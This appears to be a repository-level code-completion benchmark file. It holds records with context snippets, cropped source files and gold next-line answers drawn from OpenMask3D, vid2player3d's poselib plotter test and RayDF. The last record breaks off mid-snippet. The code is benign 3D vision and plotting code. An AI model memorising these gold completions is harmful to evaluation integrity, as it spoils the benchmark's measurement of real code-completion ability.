"snippet": "class Camera:\n def __init__(self, \n intrinsic_path, \n intrinsic_resolution, \n poses_path, \n depths_path, \n extension_depth, \n depth_scale):\n self.intrinsic = np.loadtxt(intrinsic_path)[:3, :3]\n self.intrinsic_original_resolution = intrinsic_resolution\n self.poses_path = poses_path\n self.depths_path = depths_path\n self.extension_depth = extension_depth\n self.depth_scale = depth_scale\n \n def get_adapted_intrinsic(self, desired_resolution):\n '''Get adjusted camera intrinsics.'''\n if self.intrinsic_original_resolution == desired_resolution:\n return self.intrinsic\n \n resize_width = int(math.floor(desired_resolution[1] * float(\n self.intrinsic_original_resolution[0]) / float(self.intrinsic_original_resolution[1])))\n \n adapted_intrinsic = self.intrinsic.copy()\n adapted_intrinsic[0, 0] *= float(resize_width) / float(self.intrinsic_original_resolution[0])\n adapted_intrinsic[1, 1] *= float(desired_resolution[1]) / float(self.intrinsic_original_resolution[1])\n adapted_intrinsic[0, 2] *= float(desired_resolution[0] - 1) / float(self.intrinsic_original_resolution[0] - 1)\n adapted_intrinsic[1, 2] *= float(desired_resolution[1] - 1) / float(self.intrinsic_original_resolution[1] - 1)\n return adapted_intrinsic\n \n def load_poses(self, indices):\n path = os.path.join(self.poses_path, str(0) + '.txt')\n shape = np.linalg.inv(np.loadtxt(path))[:3, :].shape\n poses = np.zeros((len(indices), shape[0], shape[1]))\n for i, idx in enumerate(indices):\n path = os.path.join(self.poses_path, str(idx) + '.txt')\n poses[i] = np.linalg.inv(np.loadtxt(path))[:3, :]\n return poses\n \n def load_depth(self, idx, depth_scale):\n depth_path = os.path.join(self.depths_path, str(idx) + self.extension_depth)\n sensor_depth = imageio.v2.imread(depth_path) / depth_scale\n return sensor_depth"
},
{
"identifier": "InstanceMasks3D",
"path": "openmask3d/data/load.py",
"snippet": "class InstanceMasks3D:\n def __init__(self, masks_path):\n self.masks = torch.load(masks_path)\n self.num_masks = self.masks.shape[1]"
},
{
"identifier": "Images",
"path": "openmask3d/data/load.py",
"snippet": "class Images:\n def __init__(self, \n images_path, \n extension, \n indices):\n self.images_path = images_path\n self.extension = extension\n self.indices = indices\n self.images = self.load_images(indices)\n \n def load_images(self, indices):\n images = []\n for idx in indices:\n img_path = os.path.join(self.images_path, str(idx) + self.extension)\n images.append(Image.open(img_path).convert(\"RGB\"))\n return images\n def get_as_np_list(self):\n images = []\n for i in range(len(self.images)):\n images.append(np.asarray(self.images[i]))\n return images"
},
{
"identifier": "PointCloud",
"path": "openmask3d/data/load.py",
"snippet": "class PointCloud:\n def __init__(self, \n point_cloud_path):\n pcd = o3d.io.read_point_cloud(point_cloud_path)\n self.points = np.asarray(pcd.points)\n self.num_points = self.points.shape[0]\n \n def get_homogeneous_coordinates(self):\n return np.append(self.points, np.ones((self.num_points,1)), axis = -1)"
},
{
"identifier": "get_number_of_images",
"path": "openmask3d/data/load.py",
"snippet": "def get_number_of_images(poses_path):\n i = 0\n while(os.path.isfile(os.path.join(poses_path, str(i) + '.txt'))): i += 1\n return i"
},
{
"identifier": "initialize_sam_model",
"path": "openmask3d/mask_features_computation/utils.py",
"snippet": "def initialize_sam_model(device, sam_model_type, sam_checkpoint):\n sam = sam_model_registry[sam_model_type](checkpoint=sam_checkpoint)\n sam.to(device)\n predictor_sam = SamPredictor(sam) \n return predictor_sam"
},
{
"identifier": "mask2box_multi_level",
"path": "openmask3d/mask_features_computation/utils.py",
"snippet": "def mask2box_multi_level(mask: torch.Tensor, level, expansion_ratio):\n x1, y1, x2 , y2 = mask2box(mask)\n if level == 0:\n return x1, y1, x2 , y2\n shape = mask.shape\n x_exp = int(abs(x2- x1)*expansion_ratio) * level\n y_exp = int(abs(y2-y1)*expansion_ratio) * level\n return max(0, x1 - x_exp), max(0, y1 - y_exp), min(shape[1], x2 + x_exp), min(shape[0], y2 + y_exp)"
},
{
"identifier": "run_sam",
"path": "openmask3d/mask_features_computation/utils.py",
"snippet": "def run_sam(image_size, num_random_rounds, num_selected_points, point_coords, predictor_sam):\n best_score = 0\n best_mask = np.zeros_like(image_size, dtype=bool)\n \n point_coords_new = np.zeros_like(point_coords)\n point_coords_new[:,0] = point_coords[:,1]\n point_coords_new[:,1] = point_coords[:,0]\n \n # Get only a random subsample of them for num_random_rounds times and choose the mask with highest confidence score\n for i in range(num_random_rounds):\n np.random.shuffle(point_coords_new)\n masks, scores, logits = predictor_sam.predict(\n point_coords=point_coords_new[:num_selected_points],\n point_labels=np.ones(point_coords_new[:num_selected_points].shape[0]),\n multimask_output=False,\n ) \n if scores[0] > best_score:\n best_score = scores[0]\n best_mask = masks[0]\n \n return best_mask"
}
] | import clip
import numpy as np
import imageio
import torch
import os
from tqdm import tqdm
from openmask3d.data.load import Camera, InstanceMasks3D, Images, PointCloud, get_number_of_images
from openmask3d.mask_features_computation.utils import initialize_sam_model, mask2box_multi_level, run_sam | 3,157 | visible_points_view = np.zeros((len(indices), n_points), dtype = bool)
print(f"[INFO] Computing the visible points in each view.")
for i, idx in tqdm(enumerate(indices)): # for each view
# *******************************************************************************************************************
# STEP 1: get the projected points
# Get the coordinates of the projected points in the i-th view (i.e. the view with index idx)
projected_points_not_norm = (intrinsic @ poses[i] @ X.T).T
# Get the mask of the points which have a non-null third coordinate to avoid division by zero
mask = (projected_points_not_norm[:, 2] != 0) # don't do the division for point with the third coord equal to zero
# Get non homogeneous coordinates of valid points (2D in the image)
projected_points[i][mask] = np.column_stack([[projected_points_not_norm[:, 0][mask]/projected_points_not_norm[:, 2][mask],
projected_points_not_norm[:, 1][mask]/projected_points_not_norm[:, 2][mask]]]).T
# *******************************************************************************************************************
# STEP 2: occlusions computation
# Load the depth from the sensor
depth_path = os.path.join(depths_path, str(idx) + '.png')
sensor_depth = imageio.imread(depth_path) / depth_scale
inside_mask = (projected_points[i,:,0] >= 0) * (projected_points[i,:,1] >= 0) \
* (projected_points[i,:,0] < width) \
* (projected_points[i,:,1] < height)
pi = projected_points[i].T
# Depth of the points of the pointcloud, projected in the i-th view, computed using the projection matrices
point_depth = projected_points_not_norm[:,2]
# Compute the visibility mask, true for all the points which are visible from the i-th view
visibility_mask = (np.abs(sensor_depth[pi[1][inside_mask], pi[0][inside_mask]]
- point_depth[inside_mask]) <= \
vis_threshold).astype(bool)
inside_mask[inside_mask == True] = visibility_mask
visible_points_view[i] = inside_mask
return visible_points_view, projected_points, resolution
def get_bbox(self, mask, view):
if(self.visible_points_in_view_in_mask[view][mask].sum()!=0):
true_values = np.where(self.visible_points_in_view_in_mask[view, mask])
valid = True
t, b, l, r = true_values[0].min(), true_values[0].max()+1, true_values[1].min(), true_values[1].max()+1
else:
valid = False
t, b, l, r = (0,0,0,0)
return valid, (t, b, l, r)
def get_visible_points_in_view_in_mask(self):
masks = self.masks
num_view = len(self.indices)
visible_points_view, projected_points, resolution = self.get_visible_points_view()
visible_points_in_view_in_mask = np.zeros((num_view, masks.num_masks, resolution[0], resolution[1]), dtype=bool)
print(f"[INFO] Computing the visible points in each view in each mask.")
for i in tqdm(range(num_view)):
for j in range(masks.num_masks):
visible_masks_points = (masks.masks[:,j] * visible_points_view[i]) > 0
proj_points = projected_points[i][visible_masks_points]
if(len(proj_points) != 0):
visible_points_in_view_in_mask[i][j][proj_points[:,1], proj_points[:,0]] = True
self.visible_points_in_view_in_mask = visible_points_in_view_in_mask
self.visible_points_view = visible_points_view
self.projected_points = projected_points
self.resolution = resolution
return visible_points_in_view_in_mask, visible_points_view, projected_points, resolution
def get_top_k_indices_per_mask(self, k):
num_points_in_view_in_mask = self.visible_points_in_view_in_mask.sum(axis=2).sum(axis=2)
topk_indices_per_mask = np.argsort(-num_points_in_view_in_mask, axis=0)[:k,:].T
return topk_indices_per_mask
class FeaturesExtractor:
def __init__(self,
camera,
clip_model,
images,
masks,
pointcloud,
sam_model_type,
sam_checkpoint,
vis_threshold,
device):
self.camera = camera
self.images = images
self.device = device
self.point_projector = PointProjector(camera, pointcloud, masks, vis_threshold, images.indices)
self.predictor_sam = initialize_sam_model(device, sam_model_type, sam_checkpoint)
self.clip_model, self.clip_preprocess = clip.load(clip_model, device)
def extract_features(self, topk, multi_level_expansion_ratio, num_levels, num_random_rounds, num_selected_points, save_crops, out_folder, optimize_gpu_usage=False):
if(save_crops):
out_folder = os.path.join(out_folder, "crops")
os.makedirs(out_folder, exist_ok=True)
topk_indices_per_mask = self.point_projector.get_top_k_indices_per_mask(topk)
num_masks = self.point_projector.masks.num_masks
mask_clip = np.zeros((num_masks, 768)) #initialize mask clip
np_images = self.images.get_as_np_list()
for mask in tqdm(range(num_masks)): # for each mask
images_crops = []
if(optimize_gpu_usage):
self.clip_model.to(torch.device('cpu'))
self.predictor_sam.model.cuda()
for view_count, view in enumerate(topk_indices_per_mask[mask]): # for each view
if(optimize_gpu_usage):
torch.cuda.empty_cache()
# Get original mask points coordinates in 2d images
point_coords = np.transpose(np.where(self.point_projector.visible_points_in_view_in_mask[view][mask] == True))
if (point_coords.shape[0] > 0):
self.predictor_sam.set_image(np_images[view])
# SAM
best_mask = run_sam(image_size=np_images[view],
num_random_rounds=num_random_rounds,
num_selected_points=num_selected_points,
point_coords=point_coords,
predictor_sam=self.predictor_sam,)
# MULTI LEVEL CROPS
for level in range(num_levels):
# get the bbox and corresponding crops
|
class PointProjector:
def __init__(self, camera: Camera,
point_cloud: PointCloud,
masks: InstanceMasks3D,
vis_threshold,
indices):
self.vis_threshold = vis_threshold
self.indices = indices
self.camera = camera
self.point_cloud = point_cloud
self.masks = masks
self.visible_points_in_view_in_mask, self.visible_points_view, self.projected_points, self.resolution = self.get_visible_points_in_view_in_mask()
def get_visible_points_view(self):
# Initialization
vis_threshold = self.vis_threshold
indices = self.indices
depth_scale = self.camera.depth_scale
poses = self.camera.load_poses(indices)
X = self.point_cloud.get_homogeneous_coordinates()
n_points = self.point_cloud.num_points
depths_path = self.camera.depths_path
resolution = imageio.imread(os.path.join(depths_path, '0.png')).shape
height = resolution[0]
width = resolution[1]
intrinsic = self.camera.get_adapted_intrinsic(resolution)
projected_points = np.zeros((len(indices), n_points, 2), dtype = int)
visible_points_view = np.zeros((len(indices), n_points), dtype = bool)
print(f"[INFO] Computing the visible points in each view.")
for i, idx in tqdm(enumerate(indices)): # for each view
# *******************************************************************************************************************
# STEP 1: get the projected points
# Get the coordinates of the projected points in the i-th view (i.e. the view with index idx)
projected_points_not_norm = (intrinsic @ poses[i] @ X.T).T
# Get the mask of the points which have a non-null third coordinate to avoid division by zero
mask = (projected_points_not_norm[:, 2] != 0) # don't do the division for point with the third coord equal to zero
# Get non homogeneous coordinates of valid points (2D in the image)
projected_points[i][mask] = np.column_stack([[projected_points_not_norm[:, 0][mask]/projected_points_not_norm[:, 2][mask],
projected_points_not_norm[:, 1][mask]/projected_points_not_norm[:, 2][mask]]]).T
# *******************************************************************************************************************
# STEP 2: occlusions computation
# Load the depth from the sensor
depth_path = os.path.join(depths_path, str(idx) + '.png')
sensor_depth = imageio.imread(depth_path) / depth_scale
inside_mask = (projected_points[i,:,0] >= 0) * (projected_points[i,:,1] >= 0) \
* (projected_points[i,:,0] < width) \
* (projected_points[i,:,1] < height)
pi = projected_points[i].T
# Depth of the points of the pointcloud, projected in the i-th view, computed using the projection matrices
point_depth = projected_points_not_norm[:,2]
# Compute the visibility mask, true for all the points which are visible from the i-th view
visibility_mask = (np.abs(sensor_depth[pi[1][inside_mask], pi[0][inside_mask]]
- point_depth[inside_mask]) <= \
vis_threshold).astype(bool)
inside_mask[inside_mask == True] = visibility_mask
visible_points_view[i] = inside_mask
return visible_points_view, projected_points, resolution
def get_bbox(self, mask, view):
if(self.visible_points_in_view_in_mask[view][mask].sum()!=0):
true_values = np.where(self.visible_points_in_view_in_mask[view, mask])
valid = True
t, b, l, r = true_values[0].min(), true_values[0].max()+1, true_values[1].min(), true_values[1].max()+1
else:
valid = False
t, b, l, r = (0,0,0,0)
return valid, (t, b, l, r)
def get_visible_points_in_view_in_mask(self):
masks = self.masks
num_view = len(self.indices)
visible_points_view, projected_points, resolution = self.get_visible_points_view()
visible_points_in_view_in_mask = np.zeros((num_view, masks.num_masks, resolution[0], resolution[1]), dtype=bool)
print(f"[INFO] Computing the visible points in each view in each mask.")
for i in tqdm(range(num_view)):
for j in range(masks.num_masks):
visible_masks_points = (masks.masks[:,j] * visible_points_view[i]) > 0
proj_points = projected_points[i][visible_masks_points]
if(len(proj_points) != 0):
visible_points_in_view_in_mask[i][j][proj_points[:,1], proj_points[:,0]] = True
self.visible_points_in_view_in_mask = visible_points_in_view_in_mask
self.visible_points_view = visible_points_view
self.projected_points = projected_points
self.resolution = resolution
return visible_points_in_view_in_mask, visible_points_view, projected_points, resolution
def get_top_k_indices_per_mask(self, k):
num_points_in_view_in_mask = self.visible_points_in_view_in_mask.sum(axis=2).sum(axis=2)
topk_indices_per_mask = np.argsort(-num_points_in_view_in_mask, axis=0)[:k,:].T
return topk_indices_per_mask
class FeaturesExtractor:
def __init__(self,
camera,
clip_model,
images,
masks,
pointcloud,
sam_model_type,
sam_checkpoint,
vis_threshold,
device):
self.camera = camera
self.images = images
self.device = device
self.point_projector = PointProjector(camera, pointcloud, masks, vis_threshold, images.indices)
self.predictor_sam = initialize_sam_model(device, sam_model_type, sam_checkpoint)
self.clip_model, self.clip_preprocess = clip.load(clip_model, device)
def extract_features(self, topk, multi_level_expansion_ratio, num_levels, num_random_rounds, num_selected_points, save_crops, out_folder, optimize_gpu_usage=False):
if(save_crops):
out_folder = os.path.join(out_folder, "crops")
os.makedirs(out_folder, exist_ok=True)
topk_indices_per_mask = self.point_projector.get_top_k_indices_per_mask(topk)
num_masks = self.point_projector.masks.num_masks
mask_clip = np.zeros((num_masks, 768)) #initialize mask clip
np_images = self.images.get_as_np_list()
for mask in tqdm(range(num_masks)): # for each mask
images_crops = []
if(optimize_gpu_usage):
self.clip_model.to(torch.device('cpu'))
self.predictor_sam.model.cuda()
for view_count, view in enumerate(topk_indices_per_mask[mask]): # for each view
if(optimize_gpu_usage):
torch.cuda.empty_cache()
# Get original mask points coordinates in 2d images
point_coords = np.transpose(np.where(self.point_projector.visible_points_in_view_in_mask[view][mask] == True))
if (point_coords.shape[0] > 0):
self.predictor_sam.set_image(np_images[view])
# SAM
best_mask = run_sam(image_size=np_images[view],
num_random_rounds=num_random_rounds,
num_selected_points=num_selected_points,
point_coords=point_coords,
predictor_sam=self.predictor_sam,)
# MULTI LEVEL CROPS
for level in range(num_levels):
# get the bbox and corresponding crops | x1, y1, x2, y2 = mask2box_multi_level(torch.from_numpy(best_mask), level, multi_level_expansion_ratio) | 6 | 2023-10-31 14:58:50+00:00 | 4k |
nv-tlabs/vid2player3d | poselib/poselib/visualization/tests/test_plotter.py | [
{
"identifier": "BasePlotterTask",
"path": "poselib/poselib/visualization/core.py",
"snippet": "class BasePlotterTask(object):\n _task_name: str # unique name of the task\n _task_type: str # type of the task is used to identify which callable\n\n def __init__(self, task_name: str, task_type: str) -> None:\n self._task_name = task_name\n self._task_type = task_type\n\n @property\n def task_name(self):\n return self._task_name\n\n @property\n def task_type(self):\n return self._task_type\n\n def get_scoped_name(self, name):\n return self._task_name + \"/\" + name\n\n def __iter__(self):\n \"\"\"Should override this function to return a list of task primitives\n \"\"\"\n raise NotImplementedError"
},
{
"identifier": "BasePlotterTasks",
"path": "poselib/poselib/visualization/core.py",
"snippet": "class BasePlotterTasks(object):\n def __init__(self, tasks) -> None:\n self._tasks = tasks\n\n def __iter__(self):\n for task in self._tasks:\n yield from task"
},
{
"identifier": "Matplotlib3DPlotter",
"path": "poselib/poselib/visualization/plt_plotter.py",
"snippet": "class Matplotlib3DPlotter(BasePlotter):\n _fig: plt.figure # plt figure\n _ax: p3.Axes3D # plt 3d axis\n # stores artist objects for each task (task name as the key)\n _artist_cache: Dict[str, Any]\n # callables for each task primitives\n _create_impl_callables: Dict[str, Callable]\n _update_impl_callables: Dict[str, Callable]\n\n def __init__(self, task: \"BasePlotterTask\") -> None:\n self._fig = plt.figure()\n self._ax = p3.Axes3D(self._fig)\n self._artist_cache = {}\n\n self._create_impl_callables = {\n \"Draw3DLines\": self._lines_create_impl,\n \"Draw3DDots\": self._dots_create_impl,\n \"Draw3DTrail\": self._trail_create_impl,\n }\n self._update_impl_callables = {\n \"Draw3DLines\": self._lines_update_impl,\n \"Draw3DDots\": self._dots_update_impl,\n \"Draw3DTrail\": self._trail_update_impl,\n }\n self._init_lim()\n super().__init__(task)\n\n @property\n def ax(self):\n return self._ax\n\n @property\n def fig(self):\n return self._fig\n\n def show(self):\n plt.show()\n\n def _min(self, x, y):\n if x is None:\n return y\n if y is None:\n return x\n return min(x, y)\n\n def _max(self, x, y):\n if x is None:\n return y\n if y is None:\n return x\n return max(x, y)\n\n def _init_lim(self):\n self._curr_x_min = None\n self._curr_y_min = None\n self._curr_z_min = None\n self._curr_x_max = None\n self._curr_y_max = None\n self._curr_z_max = None\n\n def _update_lim(self, xs, ys, zs):\n self._curr_x_min = self._min(np.min(xs), self._curr_x_min)\n self._curr_y_min = self._min(np.min(ys), self._curr_y_min)\n self._curr_z_min = self._min(np.min(zs), self._curr_z_min)\n self._curr_x_max = self._max(np.max(xs), self._curr_x_max)\n self._curr_y_max = self._max(np.max(ys), self._curr_y_max)\n self._curr_z_max = self._max(np.max(zs), self._curr_z_max)\n\n def _set_lim(self):\n if not (\n self._curr_x_min is None\n or self._curr_x_max is None\n or self._curr_y_min is None\n or self._curr_y_max is None\n or self._curr_z_min is None\n or self._curr_z_max is None\n ):\n self._ax.set_xlim3d(self._curr_x_min, self._curr_x_max)\n self._ax.set_ylim3d(self._curr_y_min, self._curr_y_max)\n self._ax.set_zlim3d(self._curr_z_min, self._curr_z_max)\n self._init_lim()\n\n @staticmethod\n def _lines_extract_xyz_impl(index, lines_task):\n return lines_task[index, :, 0], lines_task[index, :, 1], lines_task[index, :, 2]\n\n @staticmethod\n def _trail_extract_xyz_impl(index, trail_task):\n return (\n trail_task[index : index + 2, 0],\n trail_task[index : index + 2, 1],\n trail_task[index : index + 2, 2],\n )\n\n def _lines_create_impl(self, lines_task):\n color = lines_task.color\n self._artist_cache[lines_task.task_name] = [\n self._ax.plot(\n *Matplotlib3DPlotter._lines_extract_xyz_impl(i, lines_task),\n color=color,\n linewidth=lines_task.line_width,\n alpha=lines_task.alpha\n )[0]\n for i in range(len(lines_task))\n ]\n\n def _lines_update_impl(self, lines_task):\n lines_artists = self._artist_cache[lines_task.task_name]\n for i in range(len(lines_task)):\n artist = lines_artists[i]\n xs, ys, zs = Matplotlib3DPlotter._lines_extract_xyz_impl(i, lines_task)\n artist.set_data(xs, ys)\n artist.set_3d_properties(zs)\n if lines_task.influence_lim:\n self._update_lim(xs, ys, zs)\n\n def _dots_create_impl(self, dots_task):\n color = dots_task.color\n self._artist_cache[dots_task.task_name] = self._ax.plot(\n dots_task[:, 0],\n dots_task[:, 1],\n dots_task[:, 2],\n c=color,\n linestyle=\"\",\n marker=\".\",\n markersize=dots_task.marker_size,\n alpha=dots_task.alpha,\n )[0]\n\n def _dots_update_impl(self, dots_task):\n dots_artist = self._artist_cache[dots_task.task_name]\n dots_artist.set_data(dots_task[:, 0], dots_task[:, 1])\n dots_artist.set_3d_properties(dots_task[:, 2])\n if dots_task.influence_lim:\n self._update_lim(dots_task[:, 0], dots_task[:, 1], dots_task[:, 2])\n\n def _trail_create_impl(self, trail_task):\n color = trail_task.color\n trail_length = len(trail_task) - 1\n self._artist_cache[trail_task.task_name] = [\n self._ax.plot(\n *Matplotlib3DPlotter._trail_extract_xyz_impl(i, trail_task),\n color=trail_task.color,\n linewidth=trail_task.line_width,\n alpha=trail_task.alpha * (1.0 - i / (trail_length - 1))\n )[0]\n for i in range(trail_length)\n ]\n\n def _trail_update_impl(self, trail_task):\n trails_artists = self._artist_cache[trail_task.task_name]\n for i in range(len(trail_task) - 1):\n artist = trails_artists[i]\n xs, ys, zs = Matplotlib3DPlotter._trail_extract_xyz_impl(i, trail_task)\n artist.set_data(xs, ys)\n artist.set_3d_properties(zs)\n if trail_task.influence_lim:\n self._update_lim(xs, ys, zs)\n\n def _create_impl(self, task_list):\n for task in task_list:\n self._create_impl_callables[task.task_type](task)\n self._draw()\n\n def _update_impl(self, task_list):\n for task in task_list:\n self._update_impl_callables[task.task_type](task)\n self._draw()\n\n def _set_aspect_equal_3d(self):\n xlim = self._ax.get_xlim3d()\n ylim = self._ax.get_ylim3d()\n zlim = self._ax.get_zlim3d()\n\n xmean = np.mean(xlim)\n ymean = np.mean(ylim)\n zmean = np.mean(zlim)\n\n plot_radius = max(\n [\n abs(lim - mean_)\n for lims, mean_ in ((xlim, xmean), (ylim, ymean), (zlim, zmean))\n for lim in lims\n ]\n )\n\n self._ax.set_xlim3d([xmean - plot_radius, xmean + plot_radius])\n self._ax.set_ylim3d([ymean - plot_radius, ymean + plot_radius])\n self._ax.set_zlim3d([zmean - plot_radius, zmean + plot_radius])\n\n def _draw(self):\n self._set_lim()\n self._set_aspect_equal_3d()\n self._fig.canvas.draw()\n self._fig.canvas.flush_events()\n plt.pause(0.00001)"
},
{
"identifier": "Draw3DDots",
"path": "poselib/poselib/visualization/simple_plotter_tasks.py",
"snippet": "class Draw3DDots(DrawXDDots):\n @property\n def dim(self):\n return 3"
},
{
"identifier": "Draw3DLines",
"path": "poselib/poselib/visualization/simple_plotter_tasks.py",
"snippet": "class Draw3DLines(DrawXDLines):\n @property\n def dim(self):\n return 3"
}
] | from typing import cast
from ..core import BasePlotterTask, BasePlotterTasks
from ..plt_plotter import Matplotlib3DPlotter
from ..simple_plotter_tasks import Draw3DDots, Draw3DLines
import matplotlib.pyplot as plt
import numpy as np | 2,517 |
task = Draw3DLines(task_name="test",
lines=np.array([[[0, 0, 0], [0, 0, 1]], [[0, 1, 1], [0, 1, 0]]]), color="blue")
task2 = Draw3DDots(task_name="test2",
dots=np.array([[0, 0, 0], [0, 0, 1], [0, 1, 1], [0, 1, 0]]), color="red")
task3 = BasePlotterTasks([task, task2])
|
task = Draw3DLines(task_name="test",
lines=np.array([[[0, 0, 0], [0, 0, 1]], [[0, 1, 1], [0, 1, 0]]]), color="blue")
task2 = Draw3DDots(task_name="test2",
dots=np.array([[0, 0, 0], [0, 0, 1], [0, 1, 1], [0, 1, 0]]), color="red")
task3 = BasePlotterTasks([task, task2]) | plotter = Matplotlib3DPlotter(cast(BasePlotterTask, task3)) | 0 | 2023-10-30 20:43:43+00:00 | 4k |
vLAR-group/RayDF | run_mv.py | [
{
"identifier": "config_parser",
"path": "config.py",
"snippet": "def config_parser():\n parser = configargparse.ArgumentParser()\n parser.add_argument('--config', is_config_file=True,\n help='config file path')\n parser.add_argument(\"--eval_only\", action='store_true',\n help='only evaluation with pretrained model')\n\n # parameterization options\n parser.add_argument(\"--radius\", type=float, default=1.5,\n help='radius of sphere for distance field')\n\n # training options\n parser.add_argument(\"--N_rand\", type=int, default=8192,\n help='batch size')\n parser.add_argument(\"--N_iters\", type=int, default=100000,\n help='number of epochs')\n parser.add_argument(\"--lrate\", type=float, default=1e-4,\n help='learning rate')\n\n # classifier options\n parser.add_argument(\"--dist_thres\", type=float, default=1e-2,\n help='threshold to determine if the query point is occluded for the sampled view')\n parser.add_argument(\"--vis_thres\", type=float, default=0.5,\n help='threshold for binary classification')\n parser.add_argument(\"--netdepth_cls\", type=int, default=8,\n help='layers in visibilit classifier')\n parser.add_argument(\"--netwidth_cls\", type=int, default=512,\n help='channels per layer')\n parser.add_argument(\"--ext_layer_cls\", type=int, default=1,\n help='number of layers to extract individual features')\n parser.add_argument(\"--pos_weight\", type=float, default=1.,\n help='positive weight for cross-entropy loss')\n\n # multiview optimization options\n parser.add_argument(\"--N_views\", type=int, default=20,\n help='the number of reference views per ray')\n parser.add_argument(\"--w_rgb\", type=float, default=1.,\n help='weight of rgb loss')\n parser.add_argument(\"--ckpt_path_cls\", type=str, default=None,\n help='checkpoint path of classifier to reload')\n\n # ray-surface distance network\n parser.add_argument(\"--netdepth\", type=int, default=13,\n help='layers in network')\n parser.add_argument(\"--netwidth\", type=int, default=1024,\n help='channels per layer')\n parser.add_argument(\"--rgb_layer\", type=int, default=0,\n help='if true, network predicts radiance')\n parser.add_argument(\"--denoise\", action='store_true',\n help='if true, compute gradients to remove outliers')\n parser.add_argument(\"--grad_normal\", action='store_true',\n help='if true, use gradients to compute surface normal')\n parser.add_argument(\"--grad_clip\", type=float, default=-1,\n help='maximum clip value for grad norm')\n parser.add_argument(\"--outlier_thres\", type=float, default=10.,\n help='threshold to select outliers for minimizing the surface gradient')\n\n # dataset options\n parser.add_argument(\"--datadir\", type=str, default='./datasets',\n help='input data directory')\n parser.add_argument(\"--dataset\", type=str, required=True,\n help='the name of dataset for train/eval')\n parser.add_argument(\"--scene\", type=str, required=True,\n help='the name of scene for train/eval')\n parser.add_argument(\"--trainskip\", type=int, default=1,\n help='will load 1/N images from test/val sets')\n parser.add_argument(\"--testskip\", type=int, default=8,\n help='will load 1/N images from test/val sets')\n parser.add_argument(\"--voxel_sz\", type=float, default=0.005,\n help='size of voxel for tsdf integration')\n parser.add_argument(\"--cd_sample\", type=int, default=30000,\n help='the number of sampling points to compute chamfer-distance')\n parser.add_argument(\"--continuous\", action='store_true',\n help='output continuous distance maps')\n\n # logging/saving options\n parser.add_argument(\"--logdir\", type=str, default='./logs',\n help='where to store ckpts and logs')\n parser.add_argument(\"--expname\", type=str, default='',\n help='experiment name')\n parser.add_argument(\"--i_print\", type=int, default=100,\n help='frequency of console printout and metric loggin')\n parser.add_argument(\"--i_img\", type=int, default=5000,\n help='frequency of image logging')\n parser.add_argument(\"--i_weights\", type=int, default=10000,\n help='frequency of weight ckpt saving')\n\n return parser"
},
{
"identifier": "log",
"path": "utils/log.py",
"snippet": "EPS = 1e-8\ndef to_distmap(x, m=None, white_bkgd=True, min=None, max=None):\ndef to_normalmap(x, m=None, white_bkgd=True):\ndef to_colormap(x):\ndef save_config(args):"
},
{
"identifier": "convert_d",
"path": "utils/math.py",
"snippet": "def convert_d(d, scene_info, out='dist'):\n H, W, focal = scene_info['H'], scene_info['W'], scene_info['focal']\n i, j = np.meshgrid(np.arange(W, dtype=np.float32),\n np.arange(H, dtype=np.float32), indexing='xy')\n L = np.sqrt(np.power(j - H / 2., 2) + np.power(i - W / 2., 2) + focal ** 2)\n fl = focal / L\n if out == 'dist':\n return d / fl\n elif out == 'dep':\n return d * fl\n else:\n raise NotImplementedError"
},
{
"identifier": "Dataloader",
"path": "utils/dataloader.py",
"snippet": "class Dataloader:\n def __init__(self, args, device):\n self.args = args\n self.device = device\n self.N_rand = args.N_rand\n\n i_split, self.all_dists, self.all_images, masks, self.cam_poses, self.scene_info = \\\n dataloder_func[args.dataset](args.datadir, args.trainskip, args.testskip)\n\n # restore scene info\n self.scene_info['sphere_radius'] = args.radius\n self.i_train, self.i_test = i_split\n print('TRAIN views are', self.i_train)\n print('TEST views are', self.i_test)\n\n # compute rays\n all_rays = []\n for i, pose in enumerate(self.cam_poses):\n rays_o, rays_d = get_rays_np(self.scene_info, pose) # (H, W, 3), (H, W, 3), (H, W, 1)\n ray = np.concatenate([rays_o, rays_d], -1)\n all_rays.append(ray)\n all_rays = np.stack(all_rays, axis=0)\n\n self.rays, self.dists, self.masks, self.imgs = {}, {}, {}, {}\n for mode, split in zip(['train', 'test'], [self.i_train, self.i_test]):\n self.rays[mode] = np.reshape(all_rays[split], [-1, 6])\n self.dists[mode] = np.reshape(self.all_dists[split], [-1, 1])\n self.masks[mode] = np.reshape(masks[split], [-1, 1])\n if args.rgb_layer > 0:\n self.imgs[mode] = np.reshape(self.all_images[split], [-1, 3])\n\n # extract foreground rays for train/eval\n self.rays[mode+'_fg'] = self.rays[mode][self.masks[mode][:, 0]==1]\n self.dists[mode+'_fg'] = self.dists[mode][self.masks[mode][:, 0]==1]\n self.masks[mode+'_fg'] = self.masks[mode][self.masks[mode][:, 0]==1]\n if args.rgb_layer > 0:\n self.imgs[mode+'_fg'] = self.imgs[mode][self.masks[mode][:, 0]==1]\n\n\n def __call__(self, inds, mode):\n batch_rays = torch.Tensor(self.rays[mode][inds]).to(self.device)\n dists = torch.Tensor(self.dists[mode][inds]).to(self.device)\n masks = torch.Tensor(self.masks[mode][inds]).to(self.device)\n targ_dict = {'dist': dists, 'mask': masks}\n\n if self.args.rgb_layer > 0:\n images = torch.Tensor(self.imgs[mode][inds]).to(self.device)\n targ_dict['image'] = images\n\n return batch_rays, targ_dict"
},
{
"identifier": "get_ray_param",
"path": "utils/ray.py",
"snippet": "def get_ray_param(ray_fn, rays):\n samples, hit_info = ray_fn(rays)\n return samples, hit_info['t0'].detach(), hit_info['ray_dir']"
},
{
"identifier": "create_net",
"path": "net_multiview/network.py",
"snippet": "def create_net(args, scene_info, device):\n ray_fn, input_ch = get_rayparam_func(scene_info)\n\n # initialise classifier and load ckpt\n model_cls = DualVisClassifier(D=args.netdepth_cls, W=args.netwidth_cls,\n input_ch=input_ch, ext_layer=args.ext_layer_cls).to(device)\n if not args.eval_only:\n print('Reloading vis classifier from', args.ckpt_path_cls)\n cls_ckpt = torch.load(args.ckpt_path_cls)\n model_cls.load_state_dict(cls_ckpt['network_fn'])\n\n # initialise distance network for multiview optimization\n model = RaySurfDNet(D=args.netdepth, W=args.netwidth, input_ch=input_ch, rgb_layer=args.rgb_layer).to(device)\n optimizer = torch.optim.Adam(params=model.parameters(), lr=args.lrate, betas=(0.9, 0.999), capturable=True)\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.N_iters, eta_min=args.lrate*0.01)\n\n\n ############# Load checkpoints #############\n ckpts = [os.path.join(args.logdir, args.expname, f) for f in sorted(os.listdir(\n os.path.join(args.logdir, args.expname))) if 'tar' in f]\n 